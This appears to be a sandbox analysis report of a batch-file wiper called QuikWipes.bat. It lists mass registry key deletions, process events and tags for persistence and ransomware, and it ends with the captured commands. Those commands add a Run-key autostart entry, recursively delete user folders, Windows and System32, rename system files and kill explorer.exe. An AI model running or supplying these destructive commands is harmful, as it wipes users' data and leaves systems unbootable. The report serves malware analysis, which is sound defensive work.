Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm7a.dll C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C3C9CB67-F453-479A-9AB0-94AE65F2EB2F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C46C1BCE-3C52-11D0-9200-848C1D000000} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{5AA2BA46-9913-4DC7-9620-69AB0FA17AE7} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\UnattendBackup\ActiveSetup\FavoritesDelete C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{AA58ED58-01DD-4D91-8333-CF10577473F7} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{3D6A1A85-DE54-4768-9951-053B3B02B9B0} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8cec58ae-07a1-11d9-b15e-000d56bfe6ee} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0F1BE7F8-45CA-11D2-831F-00A0244D2298} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm57.dll C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{055CB2D7-2969-45CD-914B-76890722F112} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6B7F1602-D44C-11d0-A7D9-AE3D17000000} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D1AAC408-B6BB-46FB-9654-50816C21433D} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{A7866636-ED52-4722-82A9-6BAABEFDBF96} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{EAEE5C74-6D0D-4ACA-9232-0DA4A7B866BA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FC88B53C-9B2A-1A25-5867-C8612E79DBF6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1AA06BA1-0E88-11d1-8391-00C04FBD7C09} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{466d66fa-9616-11d2-9342-0000f875ae17} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B283E214-2CB3-11D0-ADA6-00400520799C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\PrivacyAdvanced C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\Restriction Policies\Hashes\DE9132D488A64BA12FC5570359923764E37A50A6 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78A9B22E-E0F4-11D0-B5DA-00C0F00AD7F8} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{60178279-6D62-43AF-A336-77925651A4C6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{62CEC9E0-3811-4C36-A94E-4F7565DCD23F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E5DF9D10-3B52-11D1-83E8-00A0C90DC849} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\InformationCard Token Provider C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{598eba02-b49a-11d2-a1c1-00609778ea66} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EFEE43D6-BFE5-44B0-8063-AC3B2966AB2C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{29CF293A-1E7D-4069-9E11-E39698D0AF95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C46C1BDC-3C52-11D0-9200-848C1D000000} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{054aae20-4bea-4347-8a35-64a533254a9d} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\NSCSINGLEEXPAND C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{4E7BD74F-2B8D-469E-8CB2-BC60BB9AAE22} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{7057e952-bd1b-11d1-8919-00c04fc2c836} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\DNT C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D986FE4B-AE67-43C8-9A89-EADDEA3EC6B6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4F720B9C-24B1-4948-A035-8853DC01F19E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA8A9780-280D-11CF-A24D-444553540000} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{ECDB03D2-6E99-11d2-875F-00A0C93C09B3} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C8FE2181-CAE7-49EE-9B04-DB7EB4DA544A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\PluginsPageFriendlyName C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{4A7C84E2-E95C-43C6-8DD3-03ABCD0EB60E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\RunDLl32Policy\cnmsm6d.dll C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{2a6eb050-7f1c-11ce-be57-00aa0051fe20} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6B7E638F-850A-101B-AFC0-4210102A8DA7} C:\Windows\system32\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{75D01070-1234-44E9-82F6-DB5B39A47C13}\DefaultExtension C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1CFEA72A-8DA8-4403-A287-3C3B5ADFEA10}\TypeLib C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D8BD090D-3F39-45FD-B29A-7FC62C2E59C3}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\EntityDataProvider.EntityDataProvider.1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2B1ED848-4ABB-11D3-A601-00105A0D058F}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{37B3B0B1-44B5-11D3-B65B-00C04F8EF32D}\ProxyStubClsid C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2660212B-070F-40D3-AFC1-1EC7DF0A995D}\NumMethods C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8ECB4C65-F7D7-11D4-B8E9-0050DACD1F75}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\.aif\OpenWithProgIds C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBA} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{50F4AA22-3684-4837-AB29-9485F697A0D1}\NumMethods C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{F3AE6A1B-BB9F-3258-AAB9-87D6BAF4C3A3} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{31B09710-EADC-11CD-B9F7-00AA004753B5}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F7041E23-1A6C-41BB-89B2-B3425C51CCD5}\NumMethods C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B7497CA8-B458-448C-B0B5-E90E48EAA8C9}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{D1788312-EDEE-4673-AE33-B3C3BC0753EA}\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset\ISO646-US C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\regedit\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4AE5476C-F4C5-4721-982A-3BE2007DCBD1}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{635CD690-56E1-42EC-B2EC-E187383908DD}\ProxyStubClsid C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FF4A9E0E-161A-4476-90EB-81AA17FA7166}\ProxyStubClsid C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\MediaCatalogMGC\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\SharePoint.OpenDocuments.3\CLSID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{000209E4-0000-0000-C000-000000000046}\TypeLib C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757306-5146-11D5-A672-00B0D022E945}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{72B06367-DE53-3111-9C49-B816EFEE3148}\2.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8E04B90C-FD37-335A-B2B6-DEB02E755036} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C21F2771-74F7-3E60-A8E2-AE42909B6B5A}\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{98DFBD12-96CB-4F07-90EA-749FF1D6B89D}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A78AFF90-049C-41EC-B1D8-665968AAC4A6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8F9F0171-BED2-11D3-80A7-005004D38CA2} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DEA7EF7F-7862-4D29-BBB4-1CC1A409CC87}\TypeLib C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Excelxmlss C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{25DAEE6C-E895-441F-BF3E-69FB4253DFE5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{FF0BFBDB-1B01-33C9-9B71-7D6F54955940}\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2DFA60E0-78B6-46A1-820A-4EBF7419D043}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E1F5EC9F-F933-492B-A242-C3CDAC6ECFBD}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{627EA7B4-95B5-4980-84C1-9D20DA4460B1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{71233FA0-8B30-45BB-8275-D4106DF98734}\NumMethods C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8BD21D60-EC42-11CE-9E0D-00AA006002F3}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5B3DFB54-36EE-45AF-9A69-366DBF999669}\1.0\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C100BEF1-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEF0-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Word.Wizard.8\CLSID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{164DDE9C-6688-4CB8-B421-BDF15A7B35E2} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F49C559D-E9E5-467C-8C18-3326AAE4EBCC}\ExtendedErrors C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{000630A5-0000-0000-C000-000000000046}\ProxyStubClsid C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{96FE0E53-312E-4904-A922-6657B25480B2} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shellex\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\MailFileAtt C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.Show.12\protocol\StdFileEditing\Verb\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{71DC7F9D-50F3-44AD-A58D-DD192A6C243A} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WMP.WTVFile\shellex\ContextMenuHandlers C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CD000002-8B95-11D1-82DB-00C04FB1625D}\Programmable C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Programmable C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F2B60A10-DED5-46FB-A914-3C6F4EBB6451}\ProxyStubClsid32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{30510720-98B5-11CF-BB82-00AA00BDCE0B}\TypeLib C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Outlook.OlkListBox.1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.doc C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED475410-B0D6-11D2-8C3B-00104B2A6676}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C86EFB14-9A22-4B11-BDD0-1F8503B542F5}\ProxyStubClsid C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{E048ADF6-C968-3275-9461-D5E85477D1B2}\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{521B4726-04E9-47E7-B3A5-CD93A7F74F5B} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{579919D2-1B10-4584-969C-3E065BD3E22D} C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2156 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2156 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2156 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2156 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2156 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2156 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2156 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2156 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2156 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1664 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2156 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Desktop\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Pictures\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Documents\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Music\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\Downloads\*

C:\Windows\system32\cmd.exe

cmd.exe /k for /R C:\Users\Admin\AppData\Roaming\ %a in (*) do @echo oops you clicked a sus link and now your files are goooone

C:\Windows\system32\cmd.exe

cmd.exe /k RMDIR C:\Windows

C:\Windows\system32\taskkill.exe

TASKKILL /F /IM EXPLORER.EXE

C:\Windows\system32\reg.exe

reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f

C:\Windows\system32\cmd.exe

cmd.exe /k RMDIR C:\Windows

C:\Windows\system32\cmd.exe

cmd.exe /k ren C:\Windows\System32\LogonUI.exe Youareanidiot.exe.pwned

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*

C:\Windows\system32\cmd.exe

cmd.exe /k ren C:\Windows\SysWOW64\* *.minishark

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\*

C:\Windows\system32\cmd.exe

